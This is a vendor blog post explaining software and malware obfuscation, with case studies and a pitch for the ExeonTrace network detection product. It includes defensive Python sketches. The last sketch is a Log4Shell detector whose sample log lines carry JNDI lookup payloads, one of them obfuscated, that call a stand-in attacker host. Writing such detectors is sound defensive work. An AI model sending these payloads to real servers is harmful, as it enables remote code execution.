Obfuscation: Good to Protect, Hard to Detect

What is Obfuscation?

Obfuscation is an important technique for protecting software, but it also carries risks, especially when used by malware authors. We took a closer look:

Obfuscation refers to the technique of deliberately making information difficult to understand, especially in the realm of computer code. An important area of obfuscation is data obfuscation, where sensitive data is obscured to protect it from unauthorized access. Two common methods are masking and encryption. With masking, some data is replaced with placeholders: often only the last four digits of a credit card number are displayed, while the others are replaced with Xs or asterisks. Encryption, on the other hand, converts data into an unreadable form that can only be decrypted with a special key.
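To make the masking idea concrete, here is a minimal Python sketch. The function name mask_card_number and its parameters are our own illustration and not part of any particular product; it simply keeps the last four digits and replaces the rest.

```python
def mask_card_number(card_number: str, visible: int = 4, mask_char: str = "X") -> str:
    """Mask all but the last `visible` digits, leaving separators untouched."""
    total_digits = sum(ch.isdigit() for ch in card_number)
    digits_to_mask = max(total_digits - visible, 0)
    masked = []
    for ch in card_number:
        if ch.isdigit() and digits_to_mask > 0:
            masked.append(mask_char)   # hide this digit
            digits_to_mask -= 1
        else:
            masked.append(ch)          # keep separators and the trailing digits
    return "".join(masked)


print(mask_card_number("4111 1111 1111 1234"))  # XXXX XXXX XXXX 1234
```

Unlike encryption, masking of this kind is one-way: the hidden digits cannot be recovered from the masked string.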

Obfuscation of computer code uses complex language and redundant logic to make the code difficult to understand. The goal is to fool both human readers and programs such as decompilers. This is done by encrypting parts of the code, removing metadata, or replacing meaningful names with meaningless ones.

Inserting unused or meaningless code is also a common practice to disguise the actual code. A tool known as an obfuscator can automate these processes and modify the source code so that it still works but is harder to understand.

Other methods of obfuscation include compressing the entire program, making the code unreadable, and altering the control flow to create unstructured, difficult-to-maintain logic. Inserting dummy code that does not affect the program's logic or result is also common. Several techniques are often combined to create a layered effect and increase security.
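The following Python sketch illustrates three of the techniques just described: meaningless names, dummy code, and altered control flow. Both functions are invented for this illustration (prices are assumed to be integers, e.g. cents); a real obfuscator would apply such transformations automatically and far more aggressively.

```python
def total_price(prices, tax_rate):
    """Readable original: sum the prices and add tax."""
    subtotal = sum(prices)
    return subtotal * (1 + tax_rate)


def a(b, c):
    # Obfuscated equivalent: meaningless names, dead code, opaque control flow.
    d, e, f = 0, 0, 7
    while e < len(b):
        if (f * f) % 2 == 1:   # opaque predicate: 49 is odd, so this is always True
            d += b[e]
        else:
            d -= f             # dead branch, never executed
        e += 1
    g = d * 3 - d * 2          # redundant arithmetic, equals d for integers
    return g * (1 + c)


prices_in_cents = [1000, 250]
print(total_price(prices_in_cents, 0.08) == a(prices_in_cents, 0.08))  # True
```

The behavior is identical, but a reader (or a decompiler) has to work noticeably harder to see that the second function is just a sum with tax.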

Endpoint Detection and Response (EDR) systems often obfuscate their own code in order to be less vulnerable. By contrast, ExeonTrace, an AI-based Network Detection and Response (NDR) solution, is completely invisible in the network and does not send any network traffic itself, so hackers can hardly recognize or manipulate it, and it does not need to be obfuscated.

There are Two Sides to Everything

Unfortunately, obfuscation is a double-edged sword—it provides protection but also presents challenges, as it is used not only by legitimate software developers but also by malicious software authors.

A well-known example is the 2020 SolarWinds attack, in which hackers used obfuscation to evade defenses and hide their attacks.

In the hands of attackers, the goal of obfuscation is to stay anonymous, reduce the risk of detection, and hide malware by changing the overall signature and fingerprint of the malicious code, even if the payload is a known threat.

The signature is typically a hash, a unique alphanumeric representation of a malware item. Signatures are very often hashes, but they can also be another short representation of a unique piece of code within a malware element.
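A short Python sketch shows why hash-based signatures are so fragile. We assume SHA-256 as the hash function here purely for illustration (the payload bytes are harmless placeholders); changing a single byte yields a completely different signature.

```python
import hashlib


def signature(data: bytes) -> str:
    """Return the SHA-256 hash of the data as a hex string."""
    return hashlib.sha256(data).hexdigest()


original = b"example payload bytes"
modified = original + b"\x00"   # one extra byte, same visible content

print(signature(original))
print(signature(modified))
print(signature(original) == signature(modified))  # False
```

A signature database that only knows the first hash will not match the second file, even though the two are functionally almost identical.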

Rather than creating a new signature by modifying the malware itself, obfuscation targets the delivery mechanism in order to fool antivirus solutions that rely on signatures (in contrast to defenses that use machine learning, predictive analytics, and AI).

Like good obfuscation, bad obfuscation can combine a variety of techniques to hide malware, creating multiple layers of obfuscation. These techniques include:

  • Packers: Software packages that compress malware programs to hide their presence and make the original code unreadable.
  • Crypters: Tools that encrypt malware programs or parts of software to restrict access to code that could alert an antivirus product through known signatures.
  • Dead code insertion: Ineffective, useless code is added to malware to disguise the appearance of a program.
  • Instruction modification: The instruction codes in malware programs are changed from the original patterns, for example by substituting or reordering instructions, which changes the appearance of the code but not its behavior.
  • Exclusive-OR (XOR): A common obfuscation method that combines each byte of the data with a key value (0x55, for example), so that the data can only be read by those who apply the same XOR key again.
  • ROT13: A simple substitution cipher that "rotates" each letter 13 places through the alphabet, so that applying it a second time restores the original text.
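XOR and ROT13 are simple enough to show in a few lines of Python. This is a minimal sketch: the key 0x55 is just the example value mentioned in the text, and the sample strings are placeholders.

```python
import codecs


def xor_bytes(data: bytes, key: int = 0x55) -> bytes:
    """XOR every byte with a single-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


secret = b"connect to server"
hidden = xor_bytes(secret)

print(hidden != secret)             # True: the bytes no longer match the plain text
print(xor_bytes(hidden) == secret)  # True: the same key reverses the operation

# ROT13 shifts each letter 13 places; non-letters are left unchanged.
print(codecs.encode("Hello", "rot_13"))  # Uryyb
```

Neither method offers real cryptographic protection, but both are enough to stop a plain string search or a static signature from matching.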

However, obfuscating the code is only the first step: no matter how much work the hacker puts into obfuscating the code to bypass EDR, the malware must communicate within the network and with the outside world in order to be “successful”. This means that communication must also be obfuscated. In contrast to the past, when networks were scanned as quickly as possible and attackers immediately tried to extract as much data as possible at once, often in the terabyte range, attackers today communicate more quietly so that the sensors and triggers of the monitoring tools do not fire. Scanning for IP addresses, for example, is carried out slowly in order to remain under the radar. Reconnaissance, in which the threat actors try to gather initial information about their targets, e.g. their network architecture, is also becoming slower and less transparent.

Case Studies: Obfuscated Attacks

PowerShell

In an "interesting" example of obfuscation, a Microsoft Windows tool called PowerShell is being abused by attackers. Malware abusing PowerShell obfuscates its activities through techniques like string encoding, command obfuscation, dynamic code execution, environment awareness, polyglot scripting, and fileless operation. These methods hide the true intent and structure of the malware, making it difficult for security systems to detect and analyze it.
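String encoding is the easiest of these techniques to demonstrate. PowerShell's -EncodedCommand parameter accepts a Base64 string of UTF-16LE text, which attackers use to hide the actual command. The Python sketch below shows how an analyst might reverse that one layer; the sample command is a harmless placeholder we built ourselves, and real samples are usually wrapped in further layers.

```python
import base64


def decode_powershell_encoded_command(encoded: str) -> str:
    """Decode the Base64 / UTF-16LE format used by PowerShell's -EncodedCommand."""
    return base64.b64decode(encoded).decode("utf-16-le")


# Build a harmless sample the same way PowerShell expects it.
sample = base64.b64encode("Write-Output 'hello'".encode("utf-16-le")).decode("ascii")

print(sample)
print(decode_powershell_encoded_command(sample))  # Write-Output 'hello'
```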

XLS.HTML

In a recent cyber-attack, a group of hackers used elaborate obfuscation techniques to hide their malicious activities. They ran a phishing campaign known as XLS.HTML, changing their encoding and encryption methods at least 10 times over a year to avoid detection. Their tactics included using plain text, escape encoding, Base64 encoding, and even Morse code. This constantly changing approach shows that attackers know they need to keep varying their methods to outsmart security measures.
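The encodings named above are all trivially reversible, which is exactly why attackers rotate them. The Python sketch below decodes one harmless sample for each; the sample strings and the helper decode_morse are our own illustration and are not taken from the actual campaign.

```python
import base64
from urllib.parse import unquote

MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
}


def decode_morse(text: str) -> str:
    """Decode space-separated Morse letters; '/' separates words."""
    words = text.strip().split("/")
    return " ".join(
        "".join(MORSE[symbol] for symbol in word.split()) for word in words
    )


print(unquote("%3Cscript%3E"))                          # escape encoding -> <script>
print(base64.b64decode("PHNjcmlwdD4=").decode("ascii"))  # Base64 -> <script>
print(decode_morse(".... - -- .-.."))                   # Morse -> HTML
```

Each variant produces a different byte sequence for the same content, so a signature written for one encoding does not match the next.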

ThinkPHP

ThinkPHP is an open source web application framework commonly used to develop PHP-based web applications. Attackers exploited the ThinkPHP vulnerabilities CVE-2018-20062 and CVE-2019-9082 to execute remote code on servers. They bypassed typical automated tools by installing an obfuscated web shell called "Dama" from a remote server, allowing persistent access and further attacks. This advanced obfuscation demonstrates a sophisticated approach to cyber-attacks.

Why You Should Not Trust Signatures (Only)

Signature-based detection is effective for known threats, but it cannot detect zero-day exploits, nor obfuscated attacks. This is why:

  • Variability of obfuscation: Malware authors use different techniques to obfuscate their malware. This can make it difficult to create reliable signatures. Even small changes in the code can cause the signature to fail.
  • Polymorphic malware: Polymorphic malware constantly changes its appearance to avoid detection, for example by re-encrypting itself with a new key. Each time it is executed, the code looks different, making it extremely difficult to create static signatures.
  • Metamorphic malware: Metamorphic malware goes a step further and rewrites its own code as it runs and spreads. This makes it even more difficult to create static signatures.
  • Zero-day exploits: Signature-based solutions rely on known threats. They fail with zero-day exploits that are new and unknown.
  • False positives: If a signature-based solution returns too many false positives, it can be inefficient. False positives can be a drain on security team resources.

There Might be an Answer…

Anomaly-based IDS solutions, on the other hand, build a model of normal system behavior and detect unusual activity.

NDR tools like ExeonTrace continuously adapt to stay ahead of the ever-evolving cyber threat landscape. They play a critical role in detecting malware and command and control (C&C) channels, even those using obfuscation techniques. Here's how they do it:

Behavioral analysis:

ExeonTrace monitors the behavior of network traffic. It identifies unusual patterns that may indicate C&C communications, such as data transmissions at unusual intervals. It examines HTTP requests, DNS traffic, and other logs to detect irregular or suspicious behavior or communication potentially associated with (obfuscated) malicious behavior.
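One widely used behavioral signal for C&C traffic is "beaconing": an infected host that calls home at suspiciously regular intervals. The Python sketch below is a generic illustration of that idea and not a description of how ExeonTrace works internally; the function beacon_score and the sample timestamps are assumptions made for this example.

```python
from statistics import mean, pstdev


def beacon_score(timestamps):
    """Coefficient of variation of the gaps between connections.

    Values close to 0 mean very regular, machine-like timing.
    Returns None if there are too few connections to judge.
    """
    if len(timestamps) < 3:
        return None
    ordered = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    average_gap = mean(gaps)
    if average_gap == 0:
        return None
    return pstdev(gaps) / average_gap


# Connection times in seconds (hypothetical data).
regular = [0, 60, 120, 181, 240, 300]   # roughly once a minute
human = [0, 5, 7, 90, 400, 410]         # bursty, irregular browsing

print(beacon_score(regular) < 0.1)   # True: very regular timing
print(beacon_score(human) > 1.0)     # True: irregular timing
```

Note that this works purely on connection metadata: the payload can be encrypted or obfuscated and the timing pattern is still visible.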

Anomaly detection at metadata level and AI analysis:

ExeonTrace analyzes metadata to identify unusual patterns that indicate suspicious activity. Machine learning models can learn to recognize typical obfuscation techniques through the suspicious behavior they cause in network traffic, e.g. atypical communication that could be associated with obfuscated code.

Since malware needs to communicate both within the network and with the outside world to be successful, it will also do so in masked form. Attackers today operate more quietly and slowly to remain undetected. ExeonTrace therefore works with long-term communication monitoring: in addition to its ability to perform batch runs within minutes, it also looks at longer periods of time, e.g. 3 days, in order to have comparative values, learn regularities, and recognize irregularities from them.
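Why the longer window matters can be shown with a small Python sketch. It is a simplified illustration and not ExeonTrace's actual algorithm: the flow tuples, the function names, and the threshold of 50 destinations are all assumptions. A slow scanner that touches one new host per hour looks harmless in any single hour but stands out over three days.

```python
from collections import defaultdict

HOUR = 3600


def distinct_destinations(flows, window_start, window_end):
    """Map each source to the set of destinations it contacted in [start, end)."""
    seen = defaultdict(set)
    for timestamp, source, destination in flows:
        if window_start <= timestamp < window_end:
            seen[source].add(destination)
    return seen


def slow_scanners(flows, window_start, window_end, threshold):
    """Return sources that contacted at least `threshold` distinct destinations."""
    seen = distinct_destinations(flows, window_start, window_end)
    return sorted(src for src, dsts in seen.items() if len(dsts) >= threshold)


# Hypothetical flows: (timestamp in seconds, source IP, destination IP).
flows = [(h * HOUR, "10.0.0.5", f"10.0.1.{h}") for h in range(72)]       # slow scan
flows += [(h * HOUR, "10.0.0.9", f"10.0.2.{h % 3}") for h in range(72)]  # normal client

print(slow_scanners(flows, 0, HOUR, threshold=50))       # []
print(slow_scanners(flows, 0, 72 * HOUR, threshold=50))  # ['10.0.0.5']
```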

Purely real-time alerting would generate a large number of alerts here: if, for example, a ping scan is detected every minute, each detection raises an alert, even though the scan does not necessarily have to be anything malicious.

ExeonTrace exchanges threat data with other security solutions, enabling faster detection of known obfuscation techniques and suspicious behavior.

Through integration with EDR solutions, ExeonTrace correlates suspicious activity detected on endpoints with network traffic. This comprehensive approach significantly improves security analysis.

Case Solved:

The Log4j vulnerability, also known as CVE-2021-44228 or Log4Shell, lets attackers remotely take control of vulnerable systems. This happens because the Log4j library does not properly handle certain inputs. Attackers can send a specially crafted request to trigger this flaw, allowing them to run malicious code on the target system. This vulnerability has been widely exploited, with attackers installing Trojan malware and crypto-miners on affected systems. To avoid detection, the malware hides its functions and file names with obfuscation.

ExeonTrace uses metadata to analyze network traffic, leveraging AI insights along with MITRE and Zeek threat intelligence. This enables us to quickly create effective queries to examine all available network data. We can see all connections made during an attack and check for signs of successful intrusions. We also look for common communication methods like LDAP, LDAPS, and RMI, which are often used with Log4j, and search for other indicators of control communication by examining specific Java classes known to be used in such attacks. When investigating the Log4j vulnerability, we can quickly identify signs of attempted attacks on servers connected to the internet and uncover malicious activities.
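As a simplified illustration of such a query, the Python sketch below searches log lines for JNDI lookups over LDAP, LDAPS, or RMI. It is not the query ExeonTrace uses. The normalization step is our own addition to cover one well-known evasion trick, in which attackers wrap single letters in nested ${lower:...} or ${upper:...} lookups; the host attacker.example is a placeholder.

```python
import re

# Matches the start of a JNDI lookup using one of the protocols named above.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi)://", re.IGNORECASE)
# Matches simple wrappers such as ${lower:j} or ${upper:N}.
SIMPLE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)


def normalize(text: str) -> str:
    """Repeatedly replace ${lower:x} / ${upper:x} wrappers with their inner text."""
    previous = None
    while previous != text:
        previous = text
        text = SIMPLE_LOOKUP.sub(lambda match: match.group(1), text)
    return text


def find_jndi_protocol(log_line: str):
    """Return the protocol of a JNDI lookup in the line, or None if there is none."""
    match = JNDI_PATTERN.search(normalize(log_line))
    return match.group(1).lower() if match else None


plain = "User-Agent: ${jndi:ldap://attacker.example/a}"
obfuscated = "User-Agent: ${${lower:j}ndi:${lower:r}mi://attacker.example/a}"

print(find_jndi_protocol(plain))                      # ldap
print(find_jndi_protocol(obfuscated))                 # rmi
print(find_jndi_protocol("User-Agent: Mozilla/5.0"))  # None
```

A string match like this only covers the obfuscation variants it was written for, which is why the network-level view of the resulting LDAP or RMI connections remains important.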

Interested in seeing how ExeonTrace works in your system and organization? Watch this recorded demo of an advanced threat for more!

Author: Harald Beutlhauser, Senior Presales Engineer

email: harald.beutlhauser@exeon.com

Published on: 22.07.2024